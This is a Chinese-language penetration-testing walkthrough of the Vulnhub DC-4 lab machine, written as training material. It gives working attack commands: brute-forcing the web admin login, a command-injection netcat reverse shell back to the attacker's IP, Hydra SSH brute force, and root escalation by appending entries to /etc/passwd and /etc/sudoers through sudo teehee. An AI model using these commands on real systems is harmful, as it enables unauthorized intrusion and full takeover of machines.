Vulnhub靶机 DC-4打靶 渗透详细过程
字数 1109 2025-08-19 12:42:26
DC-4 靶机渗透测试详细教程
靶机信息
- 下载地址: https://download.vulnhub.com/dc/DC-4.zip
- 难度: 中等
- 目标: 获取root权限
环境准备
- 将DC-4靶机导入虚拟机软件(VMware/VirtualBox)
- 确保攻击机(Kali Linux)与靶机在同一网络
渗透测试流程
1. 主机发现
使用以下命令发现靶机IP:
arp-scan -l
# 或
nmap -sn 192.168.1.0/24
2. 端口扫描
nmap -p- <靶机IP>
发现开放端口:
- 22 (SSH)
- 80 (HTTP)
详细服务扫描:
nmap -p80,22 -sV -A <靶机IP>
3. Web服务识别
whatweb http://<靶机IP>
未发现特别有价值的信息
4. Web渗透
登录页面分析
访问Web界面发现管理员登录页面
暴力破解
- 输入用户名
admin和任意密码 - 使用Burp Suite拦截登录请求
- 发送到Intruder模块进行暴力破解
- 通过响应大小判断成功密码为
happy
命令执行漏洞
- 使用
admin:happy登录后台 - 发现"Command"功能可以执行命令
- 尝试执行
whoami确认命令执行漏洞 - 抓包修改命令为反弹shell:
radio=nc+-e+/bin/bash+<攻击机IP>+8888&submit=跑
- 在Kali上监听:
nc -lvnp 8888
稳定shell
获取基本shell后升级为稳定shell:
python -c "import pty;pty.spawn('/bin/bash')"
5. SSH暴力破解
用户发现
在/home目录发现三个用户:
- charles
- jim
- sam
其中/home/jim目录下有文件:
- backups
- old-passwords.bak
- test.sh
密码提取
从old-passwords.bak获取密码列表
Hydra爆破
- 创建用户列表
user.txt:
charles
jim
sam
- 使用
old-passwords.bak作为密码字典 - 执行爆破:
hydra -L user.txt -P old-passwords.bak ssh://<靶机IP>
成功爆破出jim的密码
6. SSH登录
使用爆破出的密码登录jim账户:
ssh jim@<靶机IP>
7. 横向提权
邮件信息
检查jim的邮件:
cat /var/mail/jim
发现charles发来的邮件包含SSH密码
登录charles账户
使用邮件中的密码登录charles账户:
ssh charles@<靶机IP>
8. 权限提升
sudo权限检查
sudo -l
发现charles可以以root权限执行/usr/bin/teehee
teehee利用
- 查看帮助:
teehee --help
发现-a参数可以追加内容
- 方法一: 添加root权限用户
echo "admin::0:0:admin:/root:/bin/bash" | sudo teehee -a /etc/passwd
然后切换用户:
su - admin
- 方法二: 修改sudoers文件
echo "charles ALL=(ALL:ALL)NOPASSWD:ALL" | sudo teehee -a /etc/sudoers
获取root权限
成功提权后即可获取root shell
总结
渗透路径:
- Web登录暴力破解 → 后台命令执行 → 反弹shell
- 发现用户密码 → SSH爆破 → 获取jim权限
- 邮件信息 → 获取charles权限
- sudo提权 → 获取root权限
关键点:
- Web应用暴力破解
- 命令注入漏洞利用
- 密码重用导致的横向移动
- 不安全的sudo配置导致的权限提升